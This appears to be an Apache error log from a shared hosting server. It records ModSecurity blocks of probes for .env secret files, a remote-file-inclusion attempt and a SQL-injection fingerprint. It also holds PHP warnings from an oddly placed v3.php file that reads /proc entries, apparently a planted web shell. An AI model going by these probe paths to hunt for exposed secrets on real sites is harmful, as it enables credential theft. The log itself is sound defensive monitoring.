[Mon May 11 13:33:35.033894 2026] [ssl:error] [pid 1319886:tid 1319901] AH01941: stapling_renew_response: responder error
[Mon May 11 13:35:58.512591 2026] [security2:error] [pid 1319953:tid 1319962] [client 5.255.121.29:52716] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.culturesvoile.com"] [uri "/.env"] [unique_id "agG_HuSQ-m-m0ukSShte_wAAAUc"]
[Mon May 11 13:35:58.548010 2026] [security2:error] [pid 1319953:tid 1319962] [client 5.255.121.29:52716] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.culturesvoile.com"] [uri "/.env"] [unique_id "agG_HuSQ-m-m0ukSShte_wAAAUc"]
[Mon May 11 13:35:58.548429 2026] [security2:error] [pid 1319953:tid 1319962] [client 5.255.121.29:52716] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.culturesvoile.com"] [uri "/.env"] [unique_id "agG_HuSQ-m-m0ukSShte_wAAAUc"]
[Mon May 11 13:35:58.662255 2026] [security2:error] [pid 1320674:tid 1320691] [client 5.255.121.29:52718] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.culturesvoile.com"] [uri "/.env.local"] [unique_id "agG_HqO9RdIr1DwxYR1wowAAAME"]
[Mon May 11 13:35:58.662483 2026] [security2:error] [pid 1320674:tid 1320691] [client 5.255.121.29:52718] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.culturesvoile.com"] [uri "/.env.local"] [unique_id "agG_HqO9RdIr1DwxYR1wowAAAME"]
[Mon May 11 13:35:58.665908 2026] [security2:error] [pid 1320674:tid 1320691] [client 5.255.121.29:52718] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.culturesvoile.com"] [uri "/.env.local"] [unique_id "agG_HqO9RdIr1DwxYR1wowAAAME"]
[Mon May 11 13:35:58.815937 2026] [security2:error] [pid 1319998:tid 1320011] [client 5.255.121.29:52732] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.culturesvoile.com"] [uri "/.env.production"] [unique_id "agG_Hqt2WtvoFr7xvGyx8wAAAIs"]
[Mon May 11 13:35:58.816126 2026] [security2:error] [pid 1319998:tid 1320011] [client 5.255.121.29:52732] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.culturesvoile.com"] [uri "/.env.production"] [unique_id "agG_Hqt2WtvoFr7xvGyx8wAAAIs"]
[Mon May 11 13:35:58.816541 2026] [security2:error] [pid 1319998:tid 1320011] [client 5.255.121.29:52732] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.culturesvoile.com"] [uri "/.env.production"] [unique_id "agG_Hqt2WtvoFr7xvGyx8wAAAIs"]
[Mon May 11 13:35:58.818244 2026] [security2:error] [pid 1319885:tid 1319889] [client 5.255.121.29:52778] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.culturesvoile.com"] [uri "/backend/.env"] [unique_id "agG_HlchVQ3tCn0m9Oo1LwAAAQE"]
[Mon May 11 13:35:58.818397 2026] [security2:error] [pid 1319885:tid 1319889] [client 5.255.121.29:52778] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.culturesvoile.com"] [uri "/backend/.env"] [unique_id "agG_HlchVQ3tCn0m9Oo1LwAAAQE"]
[Mon May 11 13:35:58.821839 2026] [security2:error] [pid 1319885:tid 1319889] [client 5.255.121.29:52778] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.culturesvoile.com"] [uri "/backend/.env"] [unique_id "agG_HlchVQ3tCn0m9Oo1LwAAAQE"]
[Mon May 11 13:35:58.836904 2026] [security2:error] [pid 1320674:tid 1320708] [client 5.255.121.29:52754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.culturesvoile.com"] [uri "/api/.env"] [unique_id "agG_HqO9RdIr1DwxYR1wpAAAANM"]
[Mon May 11 13:35:58.837077 2026] [security2:error] [pid 1320674:tid 1320708] [client 5.255.121.29:52754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.culturesvoile.com"] [uri "/api/.env"] [unique_id "agG_HqO9RdIr1DwxYR1wpAAAANM"]
[Mon May 11 13:35:58.836957 2026] [security2:error] [pid 1319998:tid 1320007] [client 5.255.121.29:52768] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.culturesvoile.com"] [uri "/app/.env"] [unique_id "agG_Hqt2WtvoFr7xvGyx9AAAAIc"]
[Mon May 11 13:35:58.837322 2026] [security2:error] [pid 1319998:tid 1320007] [client 5.255.121.29:52768] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.culturesvoile.com"] [uri "/app/.env"] [unique_id "agG_Hqt2WtvoFr7xvGyx9AAAAIc"]
[Mon May 11 13:35:58.837581 2026] [security2:error] [pid 1319998:tid 1320007] [client 5.255.121.29:52768] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.culturesvoile.com"] [uri "/app/.env"] [unique_id "agG_Hqt2WtvoFr7xvGyx9AAAAIc"]
[Mon May 11 13:35:58.837610 2026] [security2:error] [pid 1320674:tid 1320708] [client 5.255.121.29:52754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.culturesvoile.com"] [uri "/api/.env"] [unique_id "agG_HqO9RdIr1DwxYR1wpAAAANM"]
[Mon May 11 13:36:46.947763 2026] [security2:error] [pid 1319886:tid 1319911] [client 102.165.5.66:57531] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agG_Tqy-5-wpj6Sx56Z16QAAAAg"], referer: https://www.piregwan-genesis.com/
[Mon May 11 13:36:52.130908 2026] [ssl:error] [pid 1319885:tid 1319930] (EAI 2)Name or service not known: [client 146.75.166.69:10180] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 13:36:52.131361 2026] [ssl:error] [pid 1319885:tid 1319930] AH01941: stapling_renew_response: responder error
[Mon May 11 13:36:52.131711 2026] [ssl:error] [pid 1320398:tid 1320419] (EAI 2)Name or service not known: [client 146.75.166.69:10021] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 13:36:52.131736 2026] [ssl:error] [pid 1320398:tid 1320419] AH01941: stapling_renew_response: responder error
[Mon May 11 13:38:00.695335 2026] [proxy:error] [pid 1319953:tid 1319966] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2090 (127.0.0.1:2090) failed
[Mon May 11 13:38:00.695997 2026] [proxy_http:error] [pid 1319953:tid 1319966] [client 31.32.194.37:46652] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Mon May 11 13:38:00.806092 2026] [security2:error] [pid 1319998:tid 1320010] [client 31.32.194.37:20632] ModSecurity: Warning. Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "440"] [id "920420"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/vnd.ms-sync.wbxml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "mail.nearoo.fr"] [uri "/___proxy_activesync/"] [unique_id "agG_mKt2WtvoFr7xvGyyoAAAAIo"]
[Mon May 11 13:38:00.807827 2026] [security2:error] [pid 1319998:tid 1320010] [client 31.32.194.37:20632] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.nearoo.fr"] [uri "/___proxy_activesync/"] [unique_id "agG_mKt2WtvoFr7xvGyyoAAAAIo"]
[Mon May 11 13:38:00.808252 2026] [security2:error] [pid 1319998:tid 1320010] [client 31.32.194.37:20632] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Request content type is not allowed by policy"] [tag "event-correlation"] [hostname "mail.nearoo.fr"] [uri "/___proxy_activesync/"] [unique_id "agG_mKt2WtvoFr7xvGyyoAAAAIo"]
[Mon May 11 13:38:01.548114 2026] [proxy:error] [pid 1319998:tid 1320010] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2090 (127.0.0.1:2090) failed
[Mon May 11 13:38:01.548452 2026] [proxy_http:error] [pid 1319998:tid 1320010] [client 31.32.194.37:20632] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Mon May 11 13:38:20.902368 2026] [security2:error] [pid 1320398:tid 1320405] [client 66.249.75.5:64059] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://88.80.187.198 found within ARGS:url: http://88.80.187.198/odessa/my_odessa.pdf"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "piregwan-genesis.com"] [uri "/piregwan.com/liens/redirect.php"] [unique_id "agG_rOJEyNRN152ArORntAAAAEU"]
[Mon May 11 13:38:20.902916 2026] [security2:error] [pid 1320398:tid 1320405] [client 66.249.75.5:64059] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "piregwan-genesis.com"] [uri "/piregwan.com/liens/redirect.php"] [unique_id "agG_rOJEyNRN152ArORntAAAAEU"]
[Mon May 11 13:38:20.903191 2026] [security2:error] [pid 1320398:tid 1320405] [client 66.249.75.5:64059] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "piregwan-genesis.com"] [uri "/piregwan.com/liens/redirect.php"] [unique_id "agG_rOJEyNRN152ArORntAAAAEU"]
[Mon May 11 13:39:01.757200 2026] [security2:error] [pid 1319953:tid 1319961] [client 43.156.125.227:59730] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "ixinabourgoin.fr"] [uri "/"] [unique_id "agG_1eSQ-m-m0ukSShtgAwAAAUY"]
[Mon May 11 13:40:40.103260 2026] [security2:error] [pid 1320674:tid 1320690] [client 129.226.93.214:38380] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "castiglionecorporatefinance.fr"] [uri "/"] [unique_id "agHAOKO9RdIr1DwxYR1yUAAAAMA"]
[Mon May 11 13:40:44.251891 2026] [security2:error] [pid 1319953:tid 1319978] [client 129.226.93.214:53956] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "castiglionecorporatefinance.fr"] [uri "/"] [unique_id "agHAPOSQ-m-m0ukSShtgewAAAVc"], referer: http://castiglionecorporatefinance.fr
[Mon May 11 13:40:49.154655 2026] [security2:error] [pid 1320398:tid 1320414] [client 129.226.93.214:34238] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.castiglionecorporatefinance.fr"] [uri "/"] [unique_id "agHAQeJEyNRN152ArORocgAAAE4"], referer: https://castiglionecorporatefinance.fr/
[Mon May 11 13:43:21.467463 2026] [:error] [pid 1319998:tid 1320020] [client 47.128.121.207:57156] File does not exist: /home/totalcloud/public_html/index.php
PHP Warning:  filesize(): stat failed for /proc/3959692/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/3959692/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/3959692/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/3959692/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/3959692/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/3959692/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 13:43:33.743241 2026] [authz_core:error] [pid 1319953:tid 1319975] [client 216.73.216.110:24254] AH01630: client denied by server configuration: /home/missmand/public_html/missmandarine.ch/learning/old/main/template/default/auth/error_log
[Mon May 11 13:43:41.240096 2026] [authz_core:error] [pid 1319953:tid 1319975] [client 216.73.216.110:24254] AH01630: client denied by server configuration: /home/missmand/public_html/missmandarine.ch/learning/old/main/template/default/auth/error_log
[Mon May 11 13:43:42.971558 2026] [security2:error] [pid 1320398:tid 1320405] [client 24.144.82.99:57838] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.webshop.totalcloud.fr"] [uri "/.env"] [unique_id "agHA7uJEyNRN152ArORplAAAAEU"]
[Mon May 11 13:43:42.971788 2026] [security2:error] [pid 1320398:tid 1320405] [client 24.144.82.99:57838] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.webshop.totalcloud.fr"] [uri "/.env"] [unique_id "agHA7uJEyNRN152ArORplAAAAEU"]
[Mon May 11 13:43:43.453104 2026] [security2:error] [pid 1320398:tid 1320405] [client 24.144.82.99:57838] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.webshop.totalcloud.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agHA7uJEyNRN152ArORplAAAAEU"]
[Mon May 11 13:44:07.468904 2026] [ssl:error] [pid 1320674:tid 1320695] [client 98.84.1.175:39711] AH02032: Hostname totalcloud.fr (default host as no SNI was provided) and hostname cpcontacts.campingcarideal.fr provided via HTTP have no compatible SSL setup for policy 'secure'
[Mon May 11 13:44:36.225724 2026] [security2:error] [pid 1319953:tid 1319968] [client 171.22.133.70:26325] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: d4fc28eaa6f9e3126315c7d6a6c97e11||1778501661||1778501301"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/wp-comments-post.php"] [unique_id "agHBJOSQ-m-m0ukSShtiSgAAAU0"], referer: http://la-grande-fabrique.com/?p=4057
[Mon May 11 13:44:36.226039 2026] [security2:error] [pid 1319953:tid 1319968] [client 171.22.133.70:26325] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/wp-comments-post.php"] [unique_id "agHBJOSQ-m-m0ukSShtiSgAAAU0"], referer: http://la-grande-fabrique.com/?p=4057
